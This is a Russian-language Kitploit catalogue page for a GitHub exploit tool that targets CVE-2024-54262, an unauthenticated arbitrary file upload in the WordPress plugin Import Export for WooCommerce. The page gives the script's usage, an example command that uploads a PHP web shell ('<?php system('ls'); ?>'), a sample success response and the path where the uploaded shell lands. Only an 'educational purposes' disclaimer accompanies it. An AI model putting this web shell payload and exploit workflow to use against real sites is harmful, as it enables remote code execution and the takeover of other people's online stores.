Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2024-54262 — Exploit CVE-2024-54262: Arbitrary File Upload in Import Export for WooCommerce | Kitploit
Инструменты/GitHubGitHub/nxploited/cve-2024-54262
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRed Teaming
GitHubnxploited/cve-2024-54262

CVE-2024-54262

Exploit CVE-2024-54262: Arbitrary File Upload in Import Export for WooCommerce

Репозиторий
1 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2024-54262

Эксплойт CVE-2024-54262: Произвольная загрузка файлов в Import Export для WooCommerce

Обзор

Этот скрипт эксплуатирует уязвимость в плагине WordPress "Import Export for WooCommerce". Уязвимость позволяет неавторизованным пользователям загружать произвольные файлы, что приводит к потенциальному удаленному выполнению кода (RCE).

Возможности:

  • Определение версии: Автоматически проверяет, использует ли сайт WordPress уязвимую версию плагина.
  • Аутентификация: Поддерживает вход в WordPress для дальнейшей эксплуатации.
  • Загрузка файлов: Позволяет загружать вредоносные PHP-файлы для RCE.

Предварительные требования:

  1. Python 3.x
  2. Необходимые библиотеки Python:
    • requests
    • argparse

Установите зависимости с помощью:

root@kitploit:~
pip install requests
  1. Убедитесь, что целевой сайт WordPress использует уязвимую версию плагина.

Использование:

root@kitploit:~
usage: CVE-2024-54262.py [-h] --url URL --username USERNAME --password PASSWORD [--command COMMAND]

Exploit CVE-2024-54262: Arbitrary File Upload in Import Export for WooCommerce

options:
  -h, --help            show this help message and exit
  --url URL, -u URL     Base URL of the WordPress site
  --username USERNAME, -un USERNAME
                        Username for login
  --password PASSWORD, -p PASSWORD
                        Password for login
  --command COMMAND, -c COMMAND
                        PHP shell code to upload

Пример:

root@kitploit:~
 CVE-2024-54262.py --url https://example.com --username admin --password admin --command "<?php system('ls'); ?>"

Пояснение вывода

  1. Сайт уязвим.
    • Указывает, что сайт WordPress использует уязвимую версию плагина.
  2. Вход выполнен успешно.
    • Подтверждает успешный вход с предоставленными учетными данными.
  3. root@kitploit:~
    {
        "status": true,
        "code": 104,
        "message": "Success",
        "data": {
            "file_name": "import_manual_1737090262.php",
            "total_requests": 1,
            "import_columns": "all",
            "product_search_type": "SKU",
            "product_operation": "create_new_update_existing",
            "field_separator": ","
        }
    }
    
    
    
  • Имя оболочки: import_manual_1737090262.php
  • Путь к оболочке: wp-content/uploads/import-export-for-woocommerce/product/

Отказ от ответственности

Этот инструмент предназначен только для образовательных целей. Автор не несет ответственности за любое неправомерное использование или ущерб, причиненный этим скриптом. Несанкционированный доступ или эксплуатация систем без явного разрешения незаконны и неэтичны.

Скачать инструмент